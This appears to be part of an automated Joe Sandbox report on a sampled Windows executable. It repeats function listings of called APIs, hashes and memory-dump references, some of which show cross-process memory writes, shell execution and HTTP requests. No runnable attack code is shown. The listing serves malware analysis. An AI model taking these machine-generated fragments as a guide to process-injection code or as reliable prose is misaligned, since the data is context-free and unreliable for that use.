                                                                                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                              APIs
                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                              • DestroyWindow.USER32(?), ref: 00455728
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 1042038666-0
                                                                                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 0041780F
                                                                                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                              • __getptd.LIBCMT ref: 00417826
                                                                                              • __amsg_exit.LIBCMT ref: 00417834
                                                                                              • __lock.LIBCMT ref: 00417844
                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                              • String ID:
                                                                                              • API String ID: 938513278-0
                                                                                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                              APIs
                                                                                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                              • ExitThread.KERNEL32 ref: 00413D4E
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                              • __freefls@4.LIBCMT ref: 00413D74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 2403457894-0
                                                                                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                              APIs
                                                                                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                              • ExitThread.KERNEL32 ref: 004151ED
                                                                                              • __freefls@4.LIBCMT ref: 00415209
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 4247068974-0
                                                                                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )$U$\
                                                                                              • API String ID: 0-3705770531
                                                                                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 0046E505
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
• CoUninitialize.OLE32 ref: 0046E53D
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
• Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
• Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
• Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
• Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
• Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
• Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
• Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
• Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
• Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
• Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
• Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
• Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
• Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
Similarity
• API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 708495834-557222456
• Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
• Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
• Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
• Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
APIs
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
• Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
• Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
• Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \$]$h
• API String ID: 4104443479-3262404753
• Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
• Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
• Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
• Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• CloseHandle.KERNEL32(?), ref: 00457E09
Strings
Similarity
• API ID: CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 2417854910-1426351568
• Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
• Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
• Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
• Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
                                                                                              Similarity
                                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3705125965-3916222277
                                                                                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 3375834691-2298589950
                                                                                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: $<
                                                                                              • API String ID: 4104443479-428540627
                                                                                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
